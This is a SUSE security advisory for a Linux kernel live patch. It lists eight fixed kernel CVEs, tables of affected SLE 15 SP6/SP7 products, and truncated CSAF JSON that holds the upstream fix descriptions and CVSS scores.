- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1103
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.16 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1096,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1103",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1096-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1096-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261096-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1096-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025014.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 4 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T04:04:40Z",
"generator": {
"date": "2026-03-27T04:04:40Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1096-1",
"initial_release_date": "2026-03-27T04:04:40Z",
"revision_history": [
{
"date": "2026-03-27T04:04:40Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:04:40Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_70-default-7-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_16-default-7-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
